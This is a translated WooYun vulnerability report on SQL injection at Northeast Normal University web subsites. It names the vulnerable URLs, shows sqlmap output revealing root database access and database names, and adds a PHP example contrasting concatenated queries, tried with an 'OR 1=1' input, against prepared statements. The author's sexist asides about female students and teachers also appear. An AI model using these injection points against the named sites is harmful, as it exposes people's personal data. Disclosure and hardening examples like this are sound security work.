
Vulnerability summary

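Bug ID: wooyun-2015-0122819

Title: SQL injection vulnerability at Northeast Normal University

Vendor: Northeast Normal University

Author: 色豹

Submitted: 2015-06-26 11:20

Fix time: 2015-07-01 11:22

Disclosed: 2015-07-01 11:22

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling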

Source: http://www.wooyun.org



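Vulnerability details

Disclosure status:

2015-06-26: Details reported to the vendor; waiting for the vendor to respond
2015-07-01: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

It's graduation season for university students, and normal universities have lots of girls. You don't know until you look, and when you look you get a shock.

Detailed description:

Vulnerable URL: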

http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'


root privileges

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]


The nenu_member table also contains sensitive information.
http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15
This subsite is also vulnerable to SQL injection.

Proof of vulnerability:


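Fix:

SQL filtering
Protect the information of the future teachers~ (especially the pretty female teachers!!)

Copyright notice: when reposting, please credit the source 色豹@乌云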
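
An added example (not code from the original report or from the affected site) of what the fix amounts to for a numeric parameter such as cs: validate it as an integer and pass it as a bound parameter in a prepared statement, rather than filtering strings. The table, columns, function names and sample rows are hypothetical, and in-memory SQLite stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hypothetical schema and handlers, not the site's real code.
// In-memory SQLite keeps it runnable offline; the stack in the report is MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE survey (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO survey VALUES (8295, 'Graduate survey'), (8296, 'Staff-only survey')");

// Vulnerable pattern: the parameter is concatenated into the SQL text,
// so its content is parsed as SQL instead of being treated as a value.
function find_survey_unsafe($db, $cs) {
    $sql = 'SELECT id, title FROM survey WHERE id = ' . $cs;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: strict integer validation first, then a bound parameter.
function find_survey($db, $cs) {
    $id = filter_var($cs, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // caller answers HTTP 400; nothing reaches the database
    }
    $stmt = $db->prepare('SELECT id, title FROM survey WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, and one carrying extra SQL.
foreach (array('8295', '8295 OR 1=1') as $cs) {
    $unsafe = count(find_survey_unsafe($db, $cs));
    $safe = find_survey($db, $cs);
    printf("cs=%-12s unsafe rows=%d  hardened=%s\n", $cs, $unsafe,
        $safe === null ? 'rejected' : count($safe) . ' row(s)');
}
```

On MySQL the same handler should connect with an account limited to SELECT on the tables it reads, not root@localhost as shown in the sqlmap output, so that a missed injection point cannot reach the other databases on the server.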


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored on: 2015-07-01 11:22

Vendor reply:

Latest status:

None